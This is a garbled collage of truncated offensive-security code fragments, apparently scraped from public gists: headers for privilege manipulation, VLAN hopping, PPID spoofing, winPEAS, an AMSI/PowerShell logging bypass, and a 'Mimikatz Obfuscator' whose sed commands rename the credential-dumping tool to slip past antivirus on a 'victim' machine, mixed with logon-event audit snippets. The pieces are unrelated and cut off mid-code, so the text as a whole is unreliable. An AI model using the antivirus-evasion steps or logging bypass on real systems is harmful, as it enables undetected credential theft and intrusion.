#include <windows.h>
#include <iostream>
#include <Lmcons.h>
#include <cstdio>
#include <tlhelp32.h>
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
using System;
using System.IO;
using System.Text;
using System.IO.Pipes;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Runtime.InteropServices;
using System.ComponentModel;
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
# This script works best in Unix/Linux environment as the script utilizes
# following applications:
# - 8021q.ko
function Run-SecurePS
$PPIDSpoofBlock = @"
S3cur3Th1sSh1t / Invoke-winPEAS.ps1
Created April 8, 2020 13:10
winPEAS in powershell
function Invoke-winPEAS
Param (
[Parameter(Position = 0, Mandatory = $true)]
using System;
using System.Management.Automation;
using System.Reflection;
namespace PSLoggingBypass
One of the many ways one could disabled PS logging/AMSI if there's prior code execution.
Author: Lee Christensen (@tifkin_)
$user = $null
$date = $null
$computer = $null
$Computer = Read-Host "Computername?"
$isonline = Test-Connection $Computer -Count 1 -ErrorAction SilentlyContinue
$date = (get-date).AddDays(-100) #choose number of days to go back
S3cur3Th1sSh1t /
Last active October 22, 2023 13:34 — forked from imaibou/
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
# Find DC list from Active Directory
$DCs = Get-ADDomainController -Filter *
# Define time for report (default is 1 day)
$startDate = (get-date).AddDays(-1)
# Store successful logon events from security logs with the specified dates and workstation/IP in an array
foreach ($DC in $DCs){
$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }}
$Days = 1
$events = @()
$events += Get-WinEvent -FilterHashtable @{
